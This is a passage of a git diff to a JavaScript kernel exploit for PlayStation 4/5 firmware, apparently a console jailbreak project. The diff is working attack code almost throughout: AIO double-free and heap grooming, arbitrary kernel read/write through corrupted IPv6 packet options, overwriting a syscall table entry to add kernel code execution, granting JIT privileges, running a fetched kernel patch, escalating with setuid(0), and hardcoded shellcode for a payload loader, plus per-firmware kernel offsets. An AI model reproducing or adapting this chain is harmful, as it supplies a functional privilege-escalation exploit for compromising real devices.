- log(`p_ucred ${p_ucred}`);
+ addr_buf.write64(0, this.pipe_addr);
+ ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
- const pipes = new View4(2);
- sysi('pipe', pipes.addr);
- const pipe_file = kread64(ofiles.add(pipes[0] * 8));
- log(`pipe file: ${pipe_file}`);
- // ofiles[pipe_fd].f_data
- const kpipe = kread64(pipe_file);
- log(`pipe pointer: ${kpipe}`);
+ data_buf.write32(0, 0x40000000);
+ ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, data_buf);
- const pipe_save = new Buffer(0x18); // sizeof struct pipebuf
- for (let off = 0; off < pipe_save.size; off += 8) {
- pipe_save.write64(off, kread64(kpipe.add(off)));
+ addr_buf.write64(0, this.pipe_addr2);
+ ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+ addr_buf.write64(0, src);
+ ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+ sysi("read", this.rpipe, dst, len);
}
- const main_sd = psd;
- const worker_sd = dirty_sd;
-
- const main_file = kread64(ofiles.add(main_sd * 8));
- log(`main sock file: ${main_file}`);
- // ofiles[sd].f_data
- const main_sock = kread64(main_file);
- log(`main sock pointer: ${main_sock}`);
- // socket.so_pcb (struct inpcb *)
- const m_pcb = kread64(main_sock.add(0x18));
- log(`main sock pcb: ${m_pcb}`);
- // inpcb.in6p_outputopts
- const m_pktopts = kread64(m_pcb.add(0x118));
- log(`main pktopts: ${m_pktopts}`);
- log(`0x100 malloc zone pointer: ${k100_addr}`);
-
- if (m_pktopts.ne(k100_addr)) {
- die('main pktopts pointer != leaked pktopts pointer');
+ _read(addr) {
+ const buf = this.rw_buf;
+ buf.write64(0, addr);
+ buf.fill(0, 8);
+ ssockopt(this.main_sd, IPPROTO_IPV6, IPV6_PKTINFO, buf);
+ gsockopt(this.worker_sd, IPPROTO_IPV6, IPV6_PKTINFO, buf);
}
- // ofiles[sd].f_data
- const reclaim_sock = kread64(kread64(ofiles.add(reclaim_sd * 8)));
- log(`reclaim sock pointer: ${reclaim_sock}`);
- // socket.so_pcb (struct inpcb *)
- const r_pcb = kread64(reclaim_sock.add(0x18));
- log(`reclaim sock pcb: ${r_pcb}`);
- // inpcb.in6p_outputopts
- const r_pktopts = kread64(r_pcb.add(0x118));
- log(`reclaim pktopts: ${r_pktopts}`);
-
- // ofiles[sd].f_data
- const worker_sock = kread64(kread64(ofiles.add(worker_sd * 8)));
- log(`worker sock pointer: ${worker_sock}`);
- // socket.so_pcb (struct inpcb *)
- const w_pcb = kread64(worker_sock.add(0x18));
- log(`worker sock pcb: ${w_pcb}`);
- // inpcb.in6p_outputopts
- const w_pktopts = kread64(w_pcb.add(0x118));
- log(`worker pktopts: ${w_pktopts}`);
-
- // get restricted read/write with pktopts pair
- // main_pktopts.ip6po_pktinfo = &worker_pktopts.ip6po_pktinfo
- const w_pktinfo = w_pktopts.add(0x10);
- pktinfo.write64(0, w_pktinfo);
- pktinfo.write64(8, 0); // clear .ip6po_nexthop
- ssockopt(main_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
-
- pktinfo.write64(0, kernel_addr);
- ssockopt(main_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
- gsockopt(worker_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
- const kstr2 = jstr(pktinfo);
- log(`*(&"evf cv"): ${kstr2}`);
- if (kstr2 !== 'evf cv') {
- die('pktopts read failed');
+ read32(addr) {
+ this._read(addr);
+ return this.rw_buf.read32(0);
}
- log('achieved restricted kernel read/write');
- // in6_pktinfo.ipi6_ifindex must be 0 (or a valid interface index) when
- // using pktopts write. we can safely modify a pipe even with this limit so
- // we corrupt that instead for arbitrary read/write. pipe.pipe_map will be
- // clobbered with zeros but that's okay
- class KernelMemory {
- constructor(main_sd, worker_sd, pipes, pipe_addr) {
- this.main_sd = main_sd;
- this.worker_sd = worker_sd;
- this.rpipe = pipes[0];
- this.wpipe = pipes[1];
- this.pipe_addr = pipe_addr; // &pipe.pipe_buf
- this.pipe_addr2 = pipe_addr.add(0x10); // &pipe.pipe_buf.buffer
- this.rw_buf = new Buffer(0x14);
- this.addr_buf = new Buffer(0x14);
- this.data_buf = new Buffer(0x14);
- this.data_buf.write32(0xc, 0x40000000);
- }
-
- _verify_len(len) {
- if (!(Number.isInteger(len) && (0 <= len <= 0xffffffff))) {
- throw TypeError('len not a 32-bit unsigned integer');
- }
- }
-
- copyin(src, dst, len) {
- this._verify_len(len);
- const main = this.main_sd;
- const worker = this.worker_sd;
- const addr_buf = this.addr_buf;
- const data_buf = this.data_buf;
-
- addr_buf.write64(0, this.pipe_addr);
- ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
-
- data_buf.write64(0, 0);
- ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, data_buf);
-
- addr_buf.write64(0, this.pipe_addr2);
- ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
-
- addr_buf.write64(0, dst);
- ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
-
- sysi('write', this.wpipe, src, len);
- }
-
- copyout(src, dst, len) {
- this._verify_len(len);
- const main = this.main_sd;
- const worker = this.worker_sd;
- const addr_buf = this.addr_buf;
- const data_buf = this.data_buf;
-
- addr_buf.write64(0, this.pipe_addr);
- ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
-
- data_buf.write32(0, 0x40000000);
- ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, data_buf);
-
- addr_buf.write64(0, this.pipe_addr2);
- ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
-
- addr_buf.write64(0, src);
- ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
-
- sysi('read', this.rpipe, dst, len);
- }
-
- _read(addr) {
- const buf = this.rw_buf;
- buf.write64(0, addr);
- buf.fill(0, 8);
- ssockopt(this.main_sd, IPPROTO_IPV6, IPV6_PKTINFO, buf);
- gsockopt(this.worker_sd, IPPROTO_IPV6, IPV6_PKTINFO, buf);
- }
-
- read32(addr) {
- this._read(addr);
- return this.rw_buf.read32(0);
- }
-
- read64(addr) {
- this._read(addr);
- return this.rw_buf.read64(0);
- }
-
- write32(addr, value) {
- this.rw_buf.write32(0, value);
- this.copyin(this.rw_buf.addr, addr, 4);
- }
-
- write64(addr, value) {
- this.rw_buf.write64(0, value);
- this.copyin(this.rw_buf.addr, addr, 8);
- }
+ read64(addr) {
+ this._read(addr);
+ return this.rw_buf.read64(0);
}
- const kmem = new KernelMemory(main_sd, worker_sd, pipes, kpipe);
- const kstr3_buf = new Buffer(8);
- kmem.copyout(kernel_addr, kstr3_buf.addr, kstr3_buf.size);
- const kstr3 = jstr(kstr3_buf);
- log(`*(&"evf cv"): ${kstr3}`);
- if (kstr3 !== 'evf cv') {
- die('pipe read failed');
+ write32(addr, value) {
+ this.rw_buf.write32(0, value);
+ this.copyin(this.rw_buf.addr, addr, 4);
}
- log('achieved arbitrary kernel read/write');
- // RESTORE: clean corrupt pointers
- // pktopts.ip6po_rthdr = NULL
- const off_ip6po_rthdr = 0x68;
- const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
- log(`reclaim rthdr: ${kmem.read64(r_rthdr_p)}`);
- kmem.write64(r_rthdr_p, 0);
- log(`reclaim rthdr: ${kmem.read64(r_rthdr_p)}`);
+ write64(addr, value) {
+ this.rw_buf.write64(0, value);
+ this.copyin(this.rw_buf.addr, addr, 8);
+ }
+ }
+ const kmem = new KernelMemory(main_sd, worker_sd, pipes, kpipe);
- const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
- log(`reclaim rthdr: ${kmem.read64(w_rthdr_p)}`);
- log(kmem.read64(w_rthdr_p));
- log(`reclaim rthdr: ${kmem.read64(w_rthdr_p)}`);
+ const kstr3_buf = new Buffer(8);
+ kmem.copyout(kernel_addr, kstr3_buf.addr, kstr3_buf.size);
+ const kstr3 = jstr(kstr3_buf);
+ log(`*(&"evf cv"): ${kstr3}`);
+ if (kstr3 !== "evf cv") {
+ die("pipe read failed");
+ }
+ log("achieved arbitrary kernel read/write");
- log('corrupt pointers cleaned');
+ // RESTORE: clean corrupt pointers
+ // pktopts.ip6po_rthdr = NULL
+ const off_ip6po_rthdr = is_ps4 ? 0x68 : 0x70;
+ const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
+ const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
+ kmem.write64(r_rthdr_p, 0);
+ kmem.write64(w_rthdr_p, 0);
+ log("corrupt pointers cleaned");
- /*
+ /*
// REMOVE once restore kernel is ready for production
// increase the ref counts to prevent deallocation
kmem.write32(main_sock, kmem.read32(main_sock) + 1);
@@ -1505,163 +1457,140 @@ function make_kernel_arw(pktopts_sds, dirty_sd, k100_addr, kernel_addr, sds) {
kmem.write32(pipe_file.add(0x28), kmem.read32(pipe_file.add(0x28)) + 2);
*/
- return [kbase, kmem, p_ucred, [kpipe, pipe_save, pktinfo_p, w_pktinfo]];
+ return [kbase, kmem, p_ucred, [kpipe, pipe_save, pktinfo_p, w_pktinfo]];
}
// FUNCTIONS FOR STAGE: PATCH KERNEL
async function get_binary(url) {
- const response = await fetch(url);
- if (!response.ok) {
- throw Error(
- `Network response was not OK, status: ${response.status}\n`
- + `failed to fetch: ${url}`);
- }
- return response.arrayBuffer();
+ const response = await fetch(url);
+ if (!response.ok) {
+ throw Error(`Network response was not OK, status: ${response.status}\nfailed to fetch: ${url}`);
+ }
+ return response.arrayBuffer();
}
async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
- if (!is_ps4) {
- throw RangeError('ps5 kernel patching unsupported');
- }
- if (!(0x800 <= version && version < 0x1000)) { // 8.00, 8.01, 8.03, 8.50, 8.52, 9.00, 9.03, 9.04, 9.50, 9.51, 9.60
- throw RangeError('kernel patching unsupported');
- }
+ if (!is_ps4) {
+ throw RangeError("ps5 kernel patching unsupported");
+ }
+ if (!(0x800 <= version && version < 0x1000)) {
+ // 8.00, 8.01, 8.03, 8.50, 8.52, 9.00, 9.03, 9.04, 9.50, 9.51, 9.60
+ throw RangeError("kernel patching unsupported");
+ }
- log('change sys_aio_submit() to sys_kexec()');
- // sysent[661] is unimplemented so free for use
- const sysent_661 = kbase.add(off_sysent_661);
- // .sy_narg = 6
- kmem.write32(sysent_661, 6);
- // .sy_call = gadgets['jmp qword ptr [rsi]']
- kmem.write64(sysent_661.add(8), kbase.add(jmp_rsi));
- // .sy_thrcnt = SY_THR_STATIC
- kmem.write32(sysent_661.add(0x2c), 1);
+ log("change sys_aio_submit() to sys_kexec()");
+ // sysent[661] is unimplemented so free for use
+ const sysent_661 = kbase.add(off_sysent_661);
+ const sy_narg = kmem.read32(sysent_661);
+ const sy_call = kmem.read64(sysent_661.add(8));
+ const sy_thrcnt = kmem.read32(sysent_661.add(0x2c));
+ // .sy_narg = 6
+ kmem.write32(sysent_661, 6);
+ // .sy_call = gadgets['jmp qword ptr [rsi]']
+ kmem.write64(sysent_661.add(8), kbase.add(jmp_rsi));
+ // .sy_thrcnt = SY_THR_STATIC
+ kmem.write32(sysent_661.add(0x2c), 1);
- log('add JIT capabilities');
- // TODO: Just set the bits for JIT privs
- // cr_sceCaps[0]
- kmem.write64(p_ucred.add(0x60), -1);
- // cr_sceCaps[1]
- kmem.write64(p_ucred.add(0x68), -1);
+ log("add JIT capabilities");
+ // TODO: Just set the bits for JIT privs
+ // cr_sceCaps[0]
+ kmem.write64(p_ucred.add(0x60), -1);
+ // cr_sceCaps[1]
+ kmem.write64(p_ucred.add(0x68), -1);
- const buf = await get_binary(patch_elf_loc);
- const patches = new View1(await buf);
- let map_size = patches.size;
- const max_size = 0x10000000;
- if (map_size > max_size) {
- die(`patch file too large (>${max_size}): ${map_size}`);
- }
- if (map_size === 0) {
- die('patch file size is zero');
- }
- log(`kpatch size: ${map_size} bytes`);
- map_size = map_size+page_size & -page_size;
+ const buf = await get_binary(patch_elf_loc);
+ const patches = new View1(await buf);
+ let map_size = patches.size;
+ const max_size = 0x10000000;
+ if (map_size > max_size) {
+ die(`patch file too large (>${max_size}): ${map_size}`);
+ }
+ if (map_size === 0) {
+ die("patch file size is zero");
+ }
+ log(`kpatch size: ${map_size} bytes`);
+ map_size = (map_size + page_size) & -page_size;
- const prot_rwx = 7;
- const prot_rx = 5;
- const prot_rw = 3;
- const exec_p = new Int(0, 9);
- const write_p = new Int(max_size, 9);
- const exec_fd = sysi('jitshm_create', 0, map_size, prot_rwx);
- const write_fd = sysi('jitshm_alias', exec_fd, prot_rw);
+ const prot_rw = 3;
+ const prot_rx = 5;
+ const prot_rwx = 7;
+ const exec_p = new Int(0, 9);
+ const write_p = new Int(max_size, 9);
+ const exec_fd = sysi("jitshm_create", 0, map_size, prot_rwx);
+ const write_fd = sysi("jitshm_alias", exec_fd, prot_rw);
- const exec_addr = chain.sysp(
- 'mmap',
- exec_p,
- map_size,
- prot_rx,
- MAP_SHARED|MAP_FIXED,
- exec_fd,
- 0,
- );
- const write_addr = chain.sysp(
- 'mmap',
- write_p,
- map_size,
- prot_rw,
- MAP_SHARED|MAP_FIXED,
- write_fd,
- 0,
- );
+ const exec_addr = chain.sysp("mmap", exec_p, map_size, prot_rx, MAP_SHARED | MAP_FIXED, exec_fd, 0);
+ const write_addr = chain.sysp("mmap", write_p, map_size, prot_rw, MAP_SHARED | MAP_FIXED, write_fd, 0);
- log(`exec_addr: ${exec_addr}`);
- log(`write_addr: ${write_addr}`);
- if (exec_addr.ne(exec_p) || write_addr.ne(write_p)) {
- die('mmap() for jit failed');
- }
+ log(`exec_addr: ${exec_addr}`);
+ log(`write_addr: ${write_addr}`);
+ if (exec_addr.ne(exec_p) || write_addr.ne(write_p)) {
+ die("mmap() for jit failed");
+ }
- log('mlock exec_addr for kernel exec');
- sysi('mlock', exec_addr, map_size);
+ log("mlock exec_addr for kernel exec");
+ sysi("mlock", exec_addr, map_size);
- // mov eax, 0x1337; ret (0xc300_0013_37b8)
- const test_code = new Int(0x001337b8, 0xc300);
- write_addr.write64(0, test_code);
+ // mov eax, 0x1337; ret (0xc300_0013_37b8)
+ const test_code = new Int(0x001337b8, 0xc300);
+ write_addr.write64(0, test_code);
- log('test jit exec');
- sys_void('kexec', exec_addr);
- let retval = chain.errno;
- log('returned successfully');
+ log("test jit exec");
+ sys_void("kexec", exec_addr);
+ let retval = chain.errno;
+ log("returned successfully");
- log(`jit retval: ${retval}`);
- if (retval !== 0x1337) {
- die('test jit exec failed');
- }
+ log(`jit retval: ${retval}`);
+ if (retval !== 0x1337) {
+ die("test jit exec failed");
+ }
- const pipe_save = restore_info[1];
- restore_info[1] = pipe_save.addr;
- log('mlock pipe save data for kernel restore');
- sysi('mlock', restore_info[1], page_size);
+ const pipe_save = restore_info[1];
+ restore_info[1] = pipe_save.addr;
+ log("mlock pipe save data for kernel restore");
+ sysi("mlock", restore_info[1], page_size);
- mem.cpy(write_addr, patches.addr, patches.size);
- sys_void('kexec', exec_addr, ...restore_info);
+ mem.cpy(write_addr, patches.addr, patches.size);
+ sys_void("kexec", exec_addr, ...restore_info);
- log('setuid(0)');
- sysi('setuid', 0);
- log('kernel exploit succeeded!');
+ log("setuid(0)");
+ sysi("setuid", 0);
+ log("kernel exploit succeeded!");
+
+ kmem.write32(sysent_661, sy_narg);
+ kmem.write64(sysent_661.add(8), sy_call);
+ kmem.write32(sysent_661.add(0x2c), sy_thrcnt);
+ log("restored dsys_aio_submit()");
}
// FUNCTIONS FOR STAGE: SETUP
function setup(block_fd) {
- // this part will block the worker threads from processing entries so that
- // we may cancel them instead. this is to work around the fact that
- // aio_worker_entry2() will fdrop() the file associated with the aio_entry
- // on ps5. we want aio_multi_delete() to call fdrop()
- log('block AIO');
- const reqs1 = new Buffer(0x28 * num_workers);
- const block_id = new Word();
+ // this part will block the worker threads from processing entries so that
+ // we may cancel them instead. this is to work around the fact that
+ // aio_worker_entry2() will fdrop() the file associated with the aio_entry
+ // on ps5. we want aio_multi_delete() to call fdrop()
+ log("block AIO");
+ const reqs1 = new Buffer(0x28 * num_workers);
+ const block_id = new Word();
- for (let i = 0; i < num_workers; i++) {
- reqs1.write32(8 + i*0x28, 1);
- reqs1.write32(0x20 + i*0x28, block_fd);
- }
- aio_submit_cmd(AIO_CMD_READ, reqs1.addr, num_workers, block_id.addr);
+ for (let i = 0; i < num_workers; i++) {
+ reqs1.write32(8 + i * 0x28, 1);
+ reqs1.write32(0x20 + i * 0x28, block_fd);
+ }
+ aio_submit_cmd(AIO_CMD_READ, reqs1.addr, num_workers, block_id.addr);
- {
- const reqs1 = make_reqs1(1);
- const timo = new Word(1);
- const id = new Word();
- aio_submit_cmd(AIO_CMD_READ, reqs1.addr, 1, id.addr);
- chain.do_syscall_clear_errno(
- 'aio_multi_wait', id.addr, 1, _aio_errors_p, 1, timo.addr);
- const err = chain.errno;
- if (err !== 60) { // ETIMEDOUT
- die(`SceAIO system not blocked. errno: ${err}`);
- }
- free_aios(id.addr, 1);
- }
-
- log('heap grooming');
- // chosen to maximize the number of 0x80 malloc allocs per submission
- const num_reqs = 3;
- const groom_ids = new View4(num_grooms);
- const groom_ids_p = groom_ids.addr;
- const greqs = make_reqs1(num_reqs);
- // allocate enough so that we start allocating from a newly created slab
- spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false);
- cancel_aios(groom_ids_p, num_grooms);
- return [block_id, groom_ids];
+ log("heap grooming");
+ // chosen to maximize the number of 0x80 malloc allocs per submission
+ const num_reqs = 3;
+ const groom_ids = new View4(num_grooms);
+ const groom_ids_p = groom_ids.addr;
+ const greqs = make_reqs1(num_reqs);
+ // allocate enough so that we start allocating from a newly created slab
+ spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false);
+ cancel_aios(groom_ids_p, num_grooms);
+ return [block_id, groom_ids];
}
// overview:
@@ -1676,81 +1605,198 @@ function setup(block_fd) {
//
// the exploit implementation also assumes that we are pinned to one core
export async function kexploit() {
- const _init_t1 = performance.now();
- await init();
- const _init_t2 = performance.now();
-
- // fun fact:
- // if the first thing you do since boot is run the web browser, WebKit can
- // use all the cores
- const main_mask = new Long();
- get_our_affinity(main_mask);
- log(`main_mask: ${main_mask}`);
-
- // pin to 1 core so that we only use 1 per-cpu bucket. this will make heap
- // spraying and grooming easier
- log(`pinning process to core #${main_core}`);
- set_our_affinity(new Long(1 << main_core));
- get_our_affinity(main_mask);
- log(`main_mask: ${main_mask}`);
-
- log('setting main thread\'s priority');
- sysi('rtprio_thread', RTP_SET, 0, rtprio.addr);
-
- const [block_fd, unblock_fd] = (() => {
- const unix_pair = new View4(2);
- sysi('socketpair', AF_UNIX, SOCK_STREAM, 0, unix_pair.addr);
- return unix_pair;
- })();
-
- const sds = [];
- for (let i = 0; i < num_sds; i++) {
- sds.push(new_socket());
+ // If setuid is successful, we dont need to run the kernel exploit again
+ try {
+ if (sysi("setuid", 0) == 0) {
+ log("Kernel already patched, skipping kexploit");
+ return true;
}
+ } catch {
+ // Expected when not in an exploited state
+ }
- let block_id = null;
- let groom_ids = null;
- try {
- log('STAGE: Setup');
- [block_id, groom_ids] = setup(block_fd);
+ const _init_t1 = performance.now();
+ await init();
+ const _init_t2 = performance.now();
- log('\nSTAGE: Double free AIO queue entry');
- const sd_pair = double_free_reqs2(sds);
+ // fun fact:
+ // if the first thing you do since boot is run the web browser, WebKit can
+ // use all the cores
+ const main_mask = new Long();
+ get_our_affinity(main_mask);
+ log(`main_mask: ${main_mask}`);
- log('\nSTAGE: Leak kernel addresses');
- const [
- reqs1_addr, kbuf_addr, kernel_addr, target_id, evf,
- ] = leak_kernel_addrs(sd_pair);
+ // pin to 1 core so that we only use 1 per-cpu bucket. this will make heap
+ // spraying and grooming easier
+ log(`pinning process to core #${main_core}`);
+ set_our_affinity(new Long(1 << main_core));
+ get_our_affinity(main_mask);
+ log(`main_mask: ${main_mask}`);
- log('\nSTAGE: Double free SceKernelAioRWRequest');
- const [pktopts_sds, dirty_sd] = double_free_reqs1(
- reqs1_addr, kbuf_addr, target_id, evf, sd_pair[0], sds,
- );
+ log("setting main thread's priority");
+ sysi("rtprio_thread", RTP_SET, 0, rtprio.addr);
- log('\nSTAGE: Get arbitrary kernel read/write');
- const [kbase, kmem, p_ucred, restore_info] = make_kernel_arw(
- pktopts_sds, dirty_sd, reqs1_addr, kernel_addr, sds);
+ const [block_fd, unblock_fd] = (() => {
+ const unix_pair = new View4(2);
+ sysi("socketpair", AF_UNIX, SOCK_STREAM, 0, unix_pair.addr);
+ return unix_pair;
+ })();
- log('\nSTAGE: Patch kernel');
- await patch_kernel(kbase, kmem, p_ucred, restore_info);
- } finally {
- close(unblock_fd);
+ const sds = [];
+ for (let i = 0; i < num_sds; i++) {
+ sds.push(new_socket());
+ }
- const t2 = performance.now();
- const ftime = t2 - t1;
- const init_time = _init_t2 - _init_t1;
- log('\ntime (include init): ' + (ftime) / 1000);
- log('kex time: ' + (t2 - _init_t2) / 1000);
- log('init time: ' + (init_time) / 1000);
- log('time to init: ' + (_init_t1 - t1) / 1000);
- log('time - init time: ' + (ftime - init_time) / 1000);
- }
- close(block_fd);
- free_aios2(groom_ids.addr, groom_ids.length);
- aio_multi_wait(block_id.addr, 1);
- aio_multi_delete(block_id.addr, block_id.length);
- for (const sd of sds) {
- close(sd);
+ let block_id = null;
+ let groom_ids = null;
+ try {
+ log("STAGE: Setup");
+ [block_id, groom_ids] = setup(block_fd);
+
+ log("\nSTAGE: Double free AIO queue entry");
+ const sd_pair = double_free_reqs2(sds);
+
+ log("\nSTAGE: Leak kernel addresses");
+ const [reqs1_addr, kbuf_addr, kernel_addr, target_id, evf] = leak_kernel_addrs(sd_pair);
+
+ log("\nSTAGE: Double free SceKernelAioRWRequest");
+ const [pktopts_sds, dirty_sd] = double_free_reqs1(reqs1_addr, kbuf_addr, target_id, evf, sd_pair[0], sds);
+
+ log("\nSTAGE: Get arbitrary kernel read/write");
+ const [kbase, kmem, p_ucred, restore_info] = make_kernel_arw(pktopts_sds, dirty_sd, reqs1_addr, kernel_addr, sds);
+
+ log("\nSTAGE: Patch kernel");
+ await patch_kernel(kbase, kmem, p_ucred, restore_info);
+ } finally {
+ close(unblock_fd);
+
+ const t2 = performance.now();
+ const ftime = t2 - t1;
+ const init_time = _init_t2 - _init_t1;
+ log(`\ntime (include init): ${ftime / 1000}`);
+ log(`kex time: ${(t2 - _init_t2) / 1000}`);
+ log(`init time: ${init_time / 1000}`);
+ log(`time to init: ${(_init_t1 - t1) / 1000}`);
+ log(`time - init time: ${(ftime - init_time) / 1000}`);
+ }
+ close(block_fd);
+ free_aios2(groom_ids.addr, groom_ids.length);
+ aio_multi_wait(block_id.addr, 1);
+ aio_multi_delete(block_id.addr, block_id.length);
+ for (const sd of sds) {
+ close(sd);
+ }
+
+ // Check if it all worked
+ try {
+ if (sysi("setuid", 0) == 0) {
+ return true;
}
+ } catch {
+ // Still not exploited, something failed, but it made it here...
+ }
+
+ return false;
}
-kexploit();
+
+// ChendoChap's from pOOBs4
+function malloc(sz) {
+ var backing = new Uint8Array(0x10000 + sz);
+ nogc.push(backing);
+ var ptr = mem.readp(mem.addrof(backing).add(0x10));
+ ptr.backing = backing;
+ return ptr;
+}
+
+// ChendoChap's from pOOBs4
+function malloc32(sz) {
+ var backing = new Uint8Array(0x10000 + sz * 4);
+ nogc.push(backing);
+ var ptr = mem.readp(mem.addrof(backing).add(0x10));
+ ptr.backing = new Uint32Array(backing.buffer);
+ return ptr;
+}
+
+// ChendoChap's from pOOBs4
+function runBinLoader() {
+ let payload_buffer = chain.sysp("mmap", 0x0, 0x300000, 0x7, 0x1000, 0xffffffff, 0);
+ let payload_loader = malloc32(0x1000);
+ let loader_writer = payload_loader.backing;
+ loader_writer[0] = 0x56415741;
+ loader_writer[1] = 0x83485541;
+ loader_writer[2] = 0x894818ec;
+ loader_writer[3] = 0xc748243c;
+ loader_writer[4] = 0x10082444;
+ loader_writer[5] = 0x483c2302;
+ loader_writer[6] = 0x102444c7;
+ loader_writer[7] = 0x00000000;
+ loader_writer[8] = 0x000002bf;
+ loader_writer[9] = 0x0001be00;
+ loader_writer[10] = 0xd2310000;
+ loader_writer[11] = 0x00009ce8;
+ loader_writer[12] = 0xc7894100;
+ loader_writer[13] = 0x8d48c789;
+ loader_writer[14] = 0xba082474;
+ loader_writer[15] = 0x00000010;
+ loader_writer[16] = 0x000095e8;
+ loader_writer[17] = 0xff894400;
+ loader_writer[18] = 0x000001be;
+ loader_writer[19] = 0x0095e800;
+ loader_writer[20] = 0x89440000;
+ loader_writer[21] = 0x31f631ff;
+ loader_writer[22] = 0x0062e8d2;
+ loader_writer[23] = 0x89410000;
+ loader_writer[24] = 0x2c8b4cc6;
+ loader_writer[25] = 0x45c64124;
+ loader_writer[26] = 0x05ebc300;
+ loader_writer[27] = 0x01499848;
+ loader_writer[28] = 0xf78944c5;
+ loader_writer[29] = 0xbaee894c;
+ loader_writer[30] = 0x00001000;
+ loader_writer[31] = 0x000025e8;
+ loader_writer[32] = 0x7fc08500;
+ loader_writer[33] = 0xff8944e7;
+ loader_writer[34] = 0x000026e8;
+ loader_writer[35] = 0xf7894400;
+ loader_writer[36] = 0x00001ee8;
+ loader_writer[37] = 0x2414ff00;
+ loader_writer[38] = 0x18c48348;
+ loader_writer[39] = 0x5e415d41;
+ loader_writer[40] = 0x31485f41;
+ loader_writer[41] = 0xc748c3c0;
+ loader_writer[42] = 0x000003c0;
+ loader_writer[43] = 0xca894900;
+ loader_writer[44] = 0x48c3050f;
+ loader_writer[45] = 0x0006c0c7;
+ loader_writer[46] = 0x89490000;
+ loader_writer[47] = 0xc3050fca;
+ loader_writer[48] = 0x1ec0c748;
+ loader_writer[49] = 0x49000000;
+ loader_writer[50] = 0x050fca89;
+ loader_writer[51] = 0xc0c748c3;
+ loader_writer[52] = 0x00000061;
+ loader_writer[53] = 0x0fca8949;
+ loader_writer[54] = 0xc748c305;
+ loader_writer[55] = 0x000068c0;
+ loader_writer[56] = 0xca894900;
+ loader_writer[57] = 0x48c3050f;
+ loader_writer[58] = 0x006ac0c7;
+ loader_writer[59] = 0x89490000;
+ loader_writer[60] = 0xc3050fca;
+
+ chain.sys("mprotect", payload_loader, 0x4000, PROT_READ | PROT_WRITE | PROT_EXEC);
+ let pthread = malloc(0x10);
+
+ {
+ sysi("mlock", payload_buffer, 0x300000);
+ call_nze("pthread_create", pthread, 0x0, payload_loader, payload_buffer);
+ }
+
+ log("Awaiting payload...");
+}
+
+kexploit().then((success) => {
+ if (success) {
+ runBinLoader();
+ }
+});
diff --git a/src/lapse/ps4/800.mjs b/src/lapse/ps4/800.mjs
index 236617a..b29d107 100644
--- a/src/lapse/ps4/800.mjs
+++ b/src/lapse/ps4/800.mjs
@@ -17,14 +17,16 @@ along with this program. If not, see . */
// 8.00, 8.01, 8.03
-export const pthread_offsets = new Map(Object.entries({
- 'pthread_create' : 0x25610,
- 'pthread_join' : 0x27c60,
- 'pthread_barrier_init' : 0xa0e0,
- 'pthread_barrier_wait' : 0x1ee00,
- 'pthread_barrier_destroy' : 0xe180,
- 'pthread_exit' : 0x19eb0,
-}));
+export const pthread_offsets = new Map(
+ Object.entries({
+ pthread_create: 0x25610,
+ pthread_join: 0x27c60,
+ pthread_barrier_init: 0xa0e0,
+ pthread_barrier_wait: 0x1ee00,
+ pthread_barrier_destroy: 0xe180,
+ pthread_exit: 0x19eb0,
+ }),
+);
export const off_kstr = 0x7edcff;
export const off_cpuid_to_pcpu = 0x228e6b0;
@@ -32,4 +34,4 @@ export const off_cpuid_to_pcpu = 0x228e6b0;
export const off_sysent_661 = 0x11040c0;
export const jmp_rsi = 0xe629c;
-export const patch_elf_loc = './kpatch/800.bin'; // Relative to `../../lapse.mjs`
+export const patch_elf_loc = "./kpatch/800.bin"; // Relative to `../../lapse.mjs`
diff --git a/src/lapse/ps4/850.mjs b/src/lapse/ps4/850.mjs
index 7da9a5f..f7d2475 100644
--- a/src/lapse/ps4/850.mjs
+++ b/src/lapse/ps4/850.mjs
@@ -17,14 +17,16 @@ along with this program. If not, see . */
// 8.50
-export const pthread_offsets = new Map(Object.entries({
- 'pthread_create' : 0xebb0,
- 'pthread_join' : 0x29d50,
- 'pthread_barrier_init' : 0x283c0,
- 'pthread_barrier_wait' : 0xb8c0,
- 'pthread_barrier_destroy' : 0x9c10,
- 'pthread_exit' : 0x25310,
-}));
+export const pthread_offsets = new Map(
+ Object.entries({
+ pthread_create: 0xebb0,
+ pthread_join: 0x29d50,
+ pthread_barrier_init: 0x283c0,
+ pthread_barrier_wait: 0xb8c0,
+ pthread_barrier_destroy: 0x9c10,
+ pthread_exit: 0x25310,
+ }),
+);
export const off_kstr = 0x7da91c;
export const off_cpuid_to_pcpu = 0x1cfc240;
@@ -32,4 +34,4 @@ export const off_cpuid_to_pcpu = 0x1cfc240;
export const off_sysent_661 = 0x11041b0;
export const jmp_rsi = 0xc810d;
-export const patch_elf_loc = './kpatch/850.bin'; // Relative to `../../lapse.mjs`
+export const patch_elf_loc = "./kpatch/850.bin"; // Relative to `../../lapse.mjs`
diff --git a/src/lapse/ps4/852.mjs b/src/lapse/ps4/852.mjs
index 958c8c9..25f65cd 100644
--- a/src/lapse/ps4/852.mjs
+++ b/src/lapse/ps4/852.mjs
@@ -17,14 +17,16 @@ along with this program. If not, see . */
// 8.52
-export const pthread_offsets = new Map(Object.entries({
- 'pthread_create' : 0xebb0,
- 'pthread_join' : 0x29d60,
- 'pthread_barrier_init' : 0x283d0,
